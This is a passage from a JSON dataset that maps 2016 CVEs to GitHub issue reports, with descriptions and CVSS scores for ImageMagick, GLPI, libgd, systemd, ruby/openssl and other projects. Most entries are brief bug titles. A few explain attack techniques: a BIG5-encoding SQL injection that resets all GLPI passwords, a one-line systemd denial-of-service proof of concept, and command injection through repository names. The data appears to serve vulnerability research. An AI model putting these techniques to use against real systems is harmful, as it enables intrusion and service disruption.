release/production when using the alternate build system, like Autotools and APITAG Sometimes its policy APITAG and Autotools) and sometimes its omission (regular developers under APITAG The library's build system, [GNU] Make, adds the define. The library is well configured in its default state.",
  2999. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  3000. "severity": "MEDIUM",
  3001. "baseScore": 5.9,
  3002. "impactScore": 3.6,
  3003. "exploitabilityScore": 2.2
  3004. },
  3005. {
  3006. "CVE_ID": "CVE-2016-7445",
  3007. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/843",
  3008. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/843",
  3009. "Repo_new": "uclouvain/openjpeg",
  3010. "Issue_Created_At": "2016-09-16T09:51:59Z",
  3011. "description": "null ptr dereference in APITAG Vulnerability openjpeg null ptr dereference in APITAG Version git head version ( URLTAG ) Address Sanitizer Output ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ff NUMBERTAG sp NUMBERTAG ff NUMBERTAG T NUMBERTAG d NUMBERTAG in skip_white PATHTAG NUMBERTAG d NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG in __libc_start_main NUMBERTAG a NUMBERTAG b in _start ??:? APITAG See poc.ppm Analysis In APITAG and APITAG variable s is uncheck after skip_int is called. A null ptr will be passed to skip_int again and will cause a null ptr dereference. Report Timeline NUMBERTAG FB3F NUMBERTAG of STARLAB discovered this issue Credit FB3F NUMBERTAG of STARLAB APITAG Contact us if you need APITAG file",
  3012. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  3013. "severity": "HIGH",
  3014. "baseScore": 7.5,
  3015. "impactScore": 3.6,
  3016. "exploitabilityScore": 3.9
  3017. },
  3018. {
  3019. "CVE_ID": "CVE-2016-7507",
  3020. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2483",
  3021. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2483",
  3022. "Repo_new": "glpi-project/glpi",
  3023. "Issue_Created_At": "2017-07-19T07:52:19Z",
  3024. "description": "Stored XSS and CSRF exploit. CVETAG CVETAG Thanks to Eric Carter (CS) Should be already fixed by fc NUMBERTAG a1",
  3025. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  3026. "severity": "HIGH",
  3027. "baseScore": 8.0,
  3028. "impactScore": 5.9,
  3029. "exploitabilityScore": 2.1
  3030. },
  3031. {
  3032. "CVE_ID": "CVE-2016-7508",
  3033. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/1047",
  3034. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/1047",
  3035. "Repo_new": "glpi-project/glpi",
  3036. "Issue_Created_At": "2016-09-23T13:29:00Z",
  3037. "description": "SQL injection with SET NAMES. CVETAG Thanks to Eric Carter (CS) APITAG Vectors] Prerequisite: the administrator of GLPI must have defined the variable $dbenc='big5' in PATHTAG to support asian encoding. It will then be possible to do SQL injection in almost all the forms of the application. For the proof of concept, the attacker targeted the APITAG form input in the User profile by adding the characters [ELIDED] before the SQL code (the request must be sent using Unicode encoding) :[ELIDED]', APITAG x Once received by the server, the request will be sanitized, giving :[ELIDED] , APITAG x The value will then be sent to the database with a BIG5 encoding. Here is the critical point, as BIG5 will see the string [ELIDED]\\ as a single asian character encoded on two bytes. As the single quote isn't escaped anymore, the SQL code will be executed and will set the password of every account to the value APITAG (=MD5 hash of \"ximaz\" string)",
  3038. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  3039. "severity": "HIGH",
  3040. "baseScore": 7.5,
  3041. "impactScore": 5.9,
  3042. "exploitabilityScore": 1.6
  3043. },
  3044. {
  3045. "CVE_ID": "CVE-2016-7514",
  3046. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/83",
  3047. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/83",
  3048. "Repo_new": "imagemagick/imagemagick",
  3049. "Issue_Created_At": "2016-01-13T11:40:06Z",
  3050. "description": "out of bounds read in APITAG APITAG CVETAG",
  3051. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3052. "severity": "MEDIUM",
  3053. "baseScore": 6.5,
  3054. "impactScore": 3.6,
  3055. "exploitabilityScore": 2.8
  3056. },
  3057. {
  3058. "CVE_ID": "CVE-2016-7515",
  3059. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/82",
  3060. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/82",
  3061. "Repo_new": "imagemagick/imagemagick",
  3062. "Issue_Created_At": "2016-01-13T03:15:41Z",
  3063. "description": "heap buffer overflow in APITAG APITAG CVETAG",
  3064. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3065. "severity": "MEDIUM",
  3066. "baseScore": 6.5,
  3067. "impactScore": 3.6,
  3068. "exploitabilityScore": 2.8
  3069. },
  3070. {
  3071. "CVE_ID": "CVE-2016-7516",
  3072. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/77",
  3073. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/77",
  3074. "Repo_new": "imagemagick/imagemagick",
  3075. "Issue_Created_At": "2016-01-13T03:14:08Z",
  3076. "description": "out of bounds read in APITAG APITAG CVETAG",
  3077. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3078. "severity": "MEDIUM",
  3079. "baseScore": 6.5,
  3080. "impactScore": 3.6,
  3081. "exploitabilityScore": 2.8
  3082. },
  3083. {
  3084. "CVE_ID": "CVE-2016-7517",
  3085. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/80",
  3086. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/80",
  3087. "Repo_new": "imagemagick/imagemagick",
  3088. "Issue_Created_At": "2016-01-13T03:15:09Z",
  3089. "description": "heap buffer overflow in APITAG APITAG CVETAG",
  3090. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3091. "severity": "MEDIUM",
  3092. "baseScore": 6.5,
  3093. "impactScore": 3.6,
  3094. "exploitabilityScore": 2.8
  3095. },
  3096. {
  3097. "CVE_ID": "CVE-2016-7518",
  3098. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/81",
  3099. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/81",
  3100. "Repo_new": "imagemagick/imagemagick",
  3101. "Issue_Created_At": "2016-01-13T03:15:26Z",
  3102. "description": "heap buffer overflow in APITAG APITAG CVETAG",
  3103. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3104. "severity": "MEDIUM",
  3105. "baseScore": 6.5,
  3106. "impactScore": 3.6,
  3107. "exploitabilityScore": 2.8
  3108. },
  3109. {
  3110. "CVE_ID": "CVE-2016-7520",
  3111. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/90",
  3112. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/90",
  3113. "Repo_new": "imagemagick/imagemagick",
  3114. "Issue_Created_At": "2016-01-22T21:50:37Z",
  3115. "description": "heap buffer overflow in APITAG CVETAG",
  3116. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3117. "severity": "MEDIUM",
  3118. "baseScore": 6.5,
  3119. "impactScore": 3.6,
  3120. "exploitabilityScore": 2.8
  3121. },
  3122. {
  3123. "CVE_ID": "CVE-2016-7521",
  3124. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/92",
  3125. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/92",
  3126. "Repo_new": "imagemagick/imagemagick",
  3127. "Issue_Created_At": "2016-01-24T01:28:42Z",
  3128. "description": "heap buffer overflow in APITAG CVETAG",
  3129. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3130. "severity": "MEDIUM",
  3131. "baseScore": 6.5,
  3132. "impactScore": 3.6,
  3133. "exploitabilityScore": 2.8
  3134. },
  3135. {
  3136. "CVE_ID": "CVE-2016-7522",
  3137. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/93",
  3138. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/93",
  3139. "Repo_new": "imagemagick/imagemagick",
  3140. "Issue_Created_At": "2016-01-24T01:28:55Z",
  3141. "description": "heap buffer overflow in APITAG CVETAG",
  3142. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3143. "severity": "MEDIUM",
  3144. "baseScore": 6.5,
  3145. "impactScore": 3.6,
  3146. "exploitabilityScore": 2.8
  3147. },
  3148. {
  3149. "CVE_ID": "CVE-2016-7523",
  3150. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/94",
  3151. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/94",
  3152. "Repo_new": "imagemagick/imagemagick",
  3153. "Issue_Created_At": "2016-01-24T01:29:08Z",
  3154. "description": "heap buffer overflow in APITAG CVETAG",
  3155. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3156. "severity": "MEDIUM",
  3157. "baseScore": 6.5,
  3158. "impactScore": 3.6,
  3159. "exploitabilityScore": 2.8
  3160. },
  3161. {
  3162. "CVE_ID": "CVE-2016-7524",
  3163. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/96",
  3164. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/96",
  3165. "Repo_new": "imagemagick/imagemagick",
  3166. "Issue_Created_At": "2016-01-24T01:29:30Z",
  3167. "description": "heap buffer overflow in APITAG CVETAG",
  3168. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3169. "severity": "MEDIUM",
  3170. "baseScore": 6.5,
  3171. "impactScore": 3.6,
  3172. "exploitabilityScore": 2.8
  3173. },
  3174. {
  3175. "CVE_ID": "CVE-2016-7525",
  3176. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/98",
  3177. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/98",
  3178. "Repo_new": "imagemagick/imagemagick",
  3179. "Issue_Created_At": "2016-01-24T01:29:49Z",
  3180. "description": "heap buffer overflow in PATHTAG CVETAG",
  3181. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3182. "severity": "MEDIUM",
  3183. "baseScore": 6.5,
  3184. "impactScore": 3.6,
  3185. "exploitabilityScore": 2.8
  3186. },
  3187. {
  3188. "CVE_ID": "CVE-2016-7526",
  3189. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/102",
  3190. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/102",
  3191. "Repo_new": "imagemagick/imagemagick",
  3192. "Issue_Created_At": "2016-01-28T12:55:52Z",
  3193. "description": "out of bounds write in PATHTAG CVETAG",
  3194. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3195. "severity": "MEDIUM",
  3196. "baseScore": 6.5,
  3197. "impactScore": 3.6,
  3198. "exploitabilityScore": 2.8
  3199. },
  3200. {
  3201. "CVE_ID": "CVE-2016-7527",
  3202. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/122",
  3203. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/122",
  3204. "Repo_new": "imagemagick/imagemagick",
  3205. "Issue_Created_At": "2016-02-05T00:53:51Z",
  3206. "description": "out of bounds read in APITAG CVETAG",
  3207. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3208. "severity": "MEDIUM",
  3209. "baseScore": 6.5,
  3210. "impactScore": 3.6,
  3211. "exploitabilityScore": 2.8
  3212. },
  3213. {
  3214. "CVE_ID": "CVE-2016-7528",
  3215. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/99",
  3216. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/99",
  3217. "Repo_new": "imagemagick/imagemagick",
  3218. "Issue_Created_At": "2016-01-24T01:29:58Z",
  3219. "description": "SEGV in APITAG CVETAG",
  3220. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3221. "severity": "MEDIUM",
  3222. "baseScore": 6.5,
  3223. "impactScore": 3.6,
  3224. "exploitabilityScore": 2.8
  3225. },
  3226. {
  3227. "CVE_ID": "CVE-2016-7529",
  3228. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/104",
  3229. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/104",
  3230. "Repo_new": "imagemagick/imagemagick",
  3231. "Issue_Created_At": "2016-01-28T12:56:13Z",
  3232. "description": "out of bounds read in APITAG CVETAG",
  3233. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3234. "severity": "MEDIUM",
  3235. "baseScore": 6.5,
  3236. "impactScore": 3.6,
  3237. "exploitabilityScore": 2.8
  3238. },
  3239. {
  3240. "CVE_ID": "CVE-2016-7529",
  3241. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/103",
  3242. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/103",
  3243. "Repo_new": "imagemagick/imagemagick",
  3244. "Issue_Created_At": "2016-01-28T12:56:03Z",
  3245. "description": "out of bounds read in APITAG CVETAG",
  3246. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3247. "severity": "MEDIUM",
  3248. "baseScore": 6.5,
  3249. "impactScore": 3.6,
  3250. "exploitabilityScore": 2.8
  3251. },
  3252. {
  3253. "CVE_ID": "CVE-2016-7530",
  3254. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/110",
  3255. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/110",
  3256. "Repo_new": "imagemagick/imagemagick",
  3257. "Issue_Created_At": "2016-01-28T12:57:17Z",
  3258. "description": "SIGFPE, Arithmetic exception in APITAG CVETAG",
  3259. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3260. "severity": "MEDIUM",
  3261. "baseScore": 6.5,
  3262. "impactScore": 3.6,
  3263. "exploitabilityScore": 2.8
  3264. },
  3265. {
  3266. "CVE_ID": "CVE-2016-7530",
  3267. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/105",
  3268. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/105",
  3269. "Repo_new": "imagemagick/imagemagick",
  3270. "Issue_Created_At": "2016-01-28T12:56:26Z",
  3271. "description": "out of bounds write in PATHTAG CVETAG",
  3272. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3273. "severity": "MEDIUM",
  3274. "baseScore": 6.5,
  3275. "impactScore": 3.6,
  3276. "exploitabilityScore": 2.8
  3277. },
  3278. {
  3279. "CVE_ID": "CVE-2016-7531",
  3280. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/107",
  3281. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/107",
  3282. "Repo_new": "imagemagick/imagemagick",
  3283. "Issue_Created_At": "2016-01-28T12:56:46Z",
  3284. "description": "out of bounds write in APITAG CVETAG",
  3285. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3286. "severity": "MEDIUM",
  3287. "baseScore": 6.5,
  3288. "impactScore": 3.6,
  3289. "exploitabilityScore": 2.8
  3290. },
  3291. {
  3292. "CVE_ID": "CVE-2016-7532",
  3293. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/109",
  3294. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/109",
  3295. "Repo_new": "imagemagick/imagemagick",
  3296. "Issue_Created_At": "2016-01-28T12:57:05Z",
  3297. "description": "out of bounds read in APITAG CVETAG",
  3298. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3299. "severity": "MEDIUM",
  3300. "baseScore": 6.5,
  3301. "impactScore": 3.6,
  3302. "exploitabilityScore": 2.8
  3303. },
  3304. {
  3305. "CVE_ID": "CVE-2016-7533",
  3306. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/120",
  3307. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/120",
  3308. "Repo_new": "imagemagick/imagemagick",
  3309. "Issue_Created_At": "2016-02-05T00:51:56Z",
  3310. "description": "out of bounds read in APITAG CVETAG",
  3311. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3312. "severity": "MEDIUM",
  3313. "baseScore": 6.5,
  3314. "impactScore": 3.6,
  3315. "exploitabilityScore": 2.8
  3316. },
  3317. {
  3318. "CVE_ID": "CVE-2016-7534",
  3319. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/126",
  3320. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/126",
  3321. "Repo_new": "imagemagick/imagemagick",
  3322. "Issue_Created_At": "2016-02-07T05:52:38Z",
  3323. "description": "out of bounds write in PATHTAG CVETAG",
  3324. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3325. "severity": "MEDIUM",
  3326. "baseScore": 6.5,
  3327. "impactScore": 3.6,
  3328. "exploitabilityScore": 2.8
  3329. },
  3330. {
  3331. "CVE_ID": "CVE-2016-7535",
  3332. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/128",
  3333. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/128",
  3334. "Repo_new": "imagemagick/imagemagick",
  3335. "Issue_Created_At": "2016-02-12T22:30:21Z",
  3336. "description": "out of bounds write in APITAG CVETAG",
  3337. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3338. "severity": "MEDIUM",
  3339. "baseScore": 6.5,
  3340. "impactScore": 3.6,
  3341. "exploitabilityScore": 2.8
  3342. },
  3343. {
  3344. "CVE_ID": "CVE-2016-7536",
  3345. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/130",
  3346. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/130",
  3347. "Repo_new": "imagemagick/imagemagick",
  3348. "Issue_Created_At": "2016-02-14T01:24:01Z",
  3349. "description": "SEGV in PATHTAG CVETAG",
  3350. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3351. "severity": "MEDIUM",
  3352. "baseScore": 6.5,
  3353. "impactScore": 3.6,
  3354. "exploitabilityScore": 2.8
  3355. },
  3356. {
  3357. "CVE_ID": "CVE-2016-7537",
  3358. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/143",
  3359. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/143",
  3360. "Repo_new": "imagemagick/imagemagick",
  3361. "Issue_Created_At": "2016-03-04T21:29:58Z",
  3362. "description": "out of bounds read in APITAG CVETAG",
  3363. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3364. "severity": "MEDIUM",
  3365. "baseScore": 6.5,
  3366. "impactScore": 3.6,
  3367. "exploitabilityScore": 2.8
  3368. },
  3369. {
  3370. "CVE_ID": "CVE-2016-7538",
  3371. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/148",
  3372. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/148",
  3373. "Repo_new": "imagemagick/imagemagick",
  3374. "Issue_Created_At": "2016-03-11T20:48:22Z",
  3375. "description": "out of bounds write in APITAG . CVETAG",
  3376. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3377. "severity": "MEDIUM",
  3378. "baseScore": 6.5,
  3379. "impactScore": 3.6,
  3380. "exploitabilityScore": 2.8
  3381. },
  3382. {
  3383. "CVE_ID": "CVE-2016-7544",
  3384. "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/302",
  3385. "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/302",
  3386. "Repo_new": "weidai11/cryptopp",
  3387. "Issue_Created_At": "2016-09-23T01:16:51Z",
  3388. "description": "AES and incorrect argument to APITAG under Microsoft compilers. John Byrd reported a crash in AES under Microsoft compilers due to use of APITAG , APITAG and APITAG . APITAG and APITAG are Microsoft SDLC functions ( alloca is on Microsoft's SDLC banned function list URLTAG . Microsoft sometimes uses the heap rather than the stack for APITAG , and that's the reason APITAG is needed. The bug is specific to Windows and Microsoft compilers. The bug does not affect Unix and Linux; and does not affect non Microsoft compilers, like ICC and Borland. The bug was introduced at Commit NUMBERTAG bc NUMBERTAG da NUMBERTAG a3 URLTAG and only affects Crypto NUMBERTAG The code in question asks APITAG for a block of memory. It also over commits the size and adjusts the pointer to a NUMBERTAG byte boundary. The pointer is sent APITAG to flush cache lines. If APITAG cannot perform the flush, then it returns false. Upon the false return, the code in reallocates, adjusts the pointer and calls APITAG again. Eventually the call succeeds. After the code in question completes, it frees the adjusted pointer and not the original pointer using APITAG .",
  3389. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  3390. "severity": "HIGH",
  3391. "baseScore": 7.5,
  3392. "impactScore": 3.6,
  3393. "exploitabilityScore": 3.9
  3394. },
  3395. {
  3396. "CVE_ID": "CVE-2016-7568",
  3397. "Issue_Url_old": "https://github.com/libgd/libgd/issues/308",
  3398. "Issue_Url_new": "https://github.com/libgd/libgd/issues/308",
  3399. "Repo_new": "libgd/libgd",
  3400. "Issue_Created_At": "2016-09-21T10:44:14Z",
  3401. "description": "Integer Overflow in APITAG of gd_webp.c. DESCRIPTION ============== An integer overflow issue was found in function APITAG of file gd_webp.c which could lead to heap buffer overflow . CREDIT ============== This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB . VULNERABILITY DETAILS ============== The bad code lies in function APITAG of file gd_webp.c . APITAG There is no overflow check before calling the APITAG function. Actually, an integer overflow can be happened here. For example NUMBERTAG Overflow NUMBERTAG The buffer will be overflowed in the following for loop. CODETAG POC ============== This issue was reported to PHP originally. So currently the proof of concept file is only available for PHP. But I think it's not hard to write a APITAG for libgd. CODETAG EXCEPTION LOG ============== Also, the exception log was generated by PHP. ERRORTAG PATCH ============== It's very easy to write a patch for this issue. Just call function overflow2 to check if overflow exists or not before calling function APITAG . APITAG TIMELINE ============== PATHTAG Report to PHP as BUG NUMBERTAG CVETAG PATHTAG Wrote a patch and created a pull request URLTAG for libgd PATHTAG Wrote a patch and created a pull request URLTAG for php src PATHTAG Fixed in PHP via NUMBERTAG df NUMBERTAG URLTAG and c NUMBERTAG e URLTAG PATHTAG Fixed in libgd via NUMBERTAG bec0f URLTAG",
  3402. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  3403. "severity": "CRITICAL",
  3404. "baseScore": 9.8,
  3405. "impactScore": 5.9,
  3406. "exploitabilityScore": 3.9
  3407. },
  3408. {
  3409. "CVE_ID": "CVE-2016-7569",
  3410. "Issue_Url_old": "https://github.com/appc/docker2aci/issues/201",
  3411. "Issue_Url_new": "https://github.com/appc/docker2aci/issues/201",
  3412. "Repo_new": "appc/docker2aci",
  3413. "Issue_Created_At": "2016-09-27T15:27:16Z",
  3414. "description": "Path traversals present in image converting. Description > in code reviewing, i found a path traversal vulnerability in docker's image converting using docker2aci, there must be a possibility that it extracts embedded layer data to arbitrary directories or paths since no essential check for file path, RCE or privilege escalation would be performed. > it is indeed true that i tested the issue by building a malicious image, if running as root, arbitrary file could be written into arbitrary paths, like backdoors, or running as unprivileged user, arbitrary files also could be extracted to some paths within the capabilities of current user. > It is quite critical, right ? Could you request a CVE for that ?",
  3415. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  3416. "severity": "MEDIUM",
  3417. "baseScore": 5.5,
  3418. "impactScore": 3.6,
  3419. "exploitabilityScore": 1.8
  3420. },
  3421. {
  3422. "CVE_ID": "CVE-2016-7793",
  3423. "Issue_Url_old": "https://github.com/sociomantic-tsunami/git-hub/issues/197",
  3424. "Issue_Url_new": "https://github.com/sociomantic-tsunami/git-hub/issues/197",
  3425. "Repo_new": "sociomantic-tsunami/git-hub",
  3426. "Issue_Created_At": "2016-09-06T20:42:18Z",
  3427. "description": "Missing sanitization of data received from APITAG git hub trusts data received from APITAG and passes it unsanitized to the git command. Malicious APITAG operators could exploit this to execute arbitrary code. For example, if APITAG reported the repository name as APITAG and the repository URL as APITAG then this would happen: ERRORTAG With Python before NUMBERTAG which didn't verify certificates by default, this bug could be also exploited by man in the middle attackers.",
  3428. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3429. "severity": "HIGH",
  3430. "baseScore": 8.8,
  3431. "impactScore": 5.9,
  3432. "exploitabilityScore": 2.8
  3433. },
  3434. {
  3435. "CVE_ID": "CVE-2016-7795",
  3436. "Issue_Url_old": "https://github.com/systemd/systemd/issues/4234",
  3437. "Issue_Url_new": "https://github.com/systemd/systemd/issues/4234",
  3438. "Repo_new": "systemd/systemd",
  3439. "Issue_Created_At": "2016-09-28T19:14:07Z",
  3440. "description": "Assertion failure when PID NUMBERTAG receives a zero length message over notify socket. systemd fails an assertion in manager_invoke_notify_message URLTAG when a zero length message is received over PATHTAG This allows a local user to perform a denial of service attack against PID NUMBERTAG Proof of concept: PATHTAG systemd notify \"\"",
  3441. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  3442. "severity": "MEDIUM",
  3443. "baseScore": 5.5,
  3444. "impactScore": 3.6,
  3445. "exploitabilityScore": 1.8
  3446. },
  3447. {
  3448. "CVE_ID": "CVE-2016-7798",
  3449. "Issue_Url_old": "https://github.com/ruby/openssl/issues/49",
  3450. "Issue_Url_new": "https://github.com/ruby/openssl/issues/49",
  3451. "Repo_new": "ruby/openssl",
  3452. "Issue_Created_At": "2016-03-27T15:13:53Z",
  3453. "description": "Possible bug: order of setting key vs. IV affects encryption with AES GCM. Hello, I think I may have found a possible bug in the ruby openssl code for encryption. If initialization vector is set _before_ setting the encryption key when using one of the APITAG algorithms, the encryption does not take the IV into account at all and two different IVs (with the same key) produce the same encrypted ciphertext. If IV is set _after_ the key, everything behaves perfectly OK. This issue does not affect other algorithms, only the AES GCM ones. APITAG more context about how I came to this conclusion, please see this stack overflow question URLTAG and this pull request URLTAG in the encryptor gem._ Let me first show a simple test in ruby, to prove this issue: CODETAG When you run this test file, you'll get these results: CODETAG The critical lines are lines NUMBERTAG and NUMBERTAG They show that when the IV is set before the encryption key, the IV is not taken into account. Lines NUMBERTAG show that it this behavior is not present in the CBC encryption mode. I tried to do further tests and they suggest that this behavior is caused by the pre initialization of the encryption key in APITAG URLTAG . In the following test, I tried to closely mimic the C calls that ruby openssl makes when doing a very simple encryption task: ERRORTAG The test tries to encrypt the same data as in the ruby test above, with IV set before / after the key and with or without the pre initialization of the key. Compiling and running the test reveals the following: CODETAG The test shows that when the key pre initialization (i.e. setting the key to all zeroes when configuring the cipher) is skipped, the IV, even if set before the encryption key, is correctly taken into account. On the other hand, when the pre initialization takes place, the IV must be set after the key for the data to be encrypted correctly. 
I have not experienced any seg faults when not preinitializing the key (a warning about this is present in the comment above the preinitialization code). I compiled and tested the code above against master branch of openssl URLTAG as well as APITAG with the same results. Overall, this behavior seems to me like a bug. Nowhere in the ruby openssl documentation have I found any mention about the order of setting IV vs key being relevant for the encryption process . I believe this should perhaps be more explicitly documented, because accidentally setting IVs before keys with GCM algorithms would lead to a severe weakening of the whole encryption , without the user being warned in any way. What do you think? Let me know if you need further info and thanks!",
  3454. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  3455. "severity": "HIGH",
  3456. "baseScore": 7.5,
  3457. "impactScore": 3.6,
  3458. "exploitabilityScore": 3.9
  3459. },
  3460. {
  3461. "CVE_ID": "CVE-2016-7799",
  3462. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/280",
  3463. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/280",
  3464. "Repo_new": "imagemagick/imagemagick",
  3465. "Issue_Created_At": "2016-09-30T10:18:19Z",
